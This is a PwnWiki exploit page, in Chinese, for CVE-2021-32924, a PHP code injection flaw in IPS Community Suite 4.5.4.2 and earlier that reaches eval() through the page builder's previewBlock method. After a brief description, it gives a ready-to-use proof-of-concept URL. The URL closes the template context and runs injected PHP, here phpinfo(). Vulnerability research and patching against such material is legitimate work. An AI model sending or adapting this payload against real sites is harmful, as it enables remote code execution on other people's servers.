CVE-2021-32924 IPS Community Suite 4.5.4.2 PHP代碼注入漏洞

From PwnWiki
Revision as of 10:44, 1 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎español • ‎português • ‎中文(中国大陆)‎

簡介

IPS Community Suite versions 4.5.4.2及以下版本存在 PHP 代碼注入漏洞。 該漏洞的存在是因為IPS\cms\modules\front\pages\_builder::previewBlock()方法允許將任意內容傳遞給IPS\_Theme::runProcessFunction()方法,該方法將用於調用eval()PHP函數。 這可以被利用來注入和執行任意 PHP 代碼。 成功利用此漏洞需要具有管理側邊欄權限的帳戶(例如版主或管理員)並啟用“cms”應用程序。

POC

http://[host]/[ips]/index.php?app=cms&module=pages&controller=builder&do=previewBlock&block_plugin=stats&block_template_use_how=copy&block_plugin_app=core&_sending=block_content&block_content=RCE%0ACONTENT;}}phpinfo();die;/*
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-32924_IPS_Community_Suite_4.5.4.2_PHP代碼注入漏洞&oldid=3811"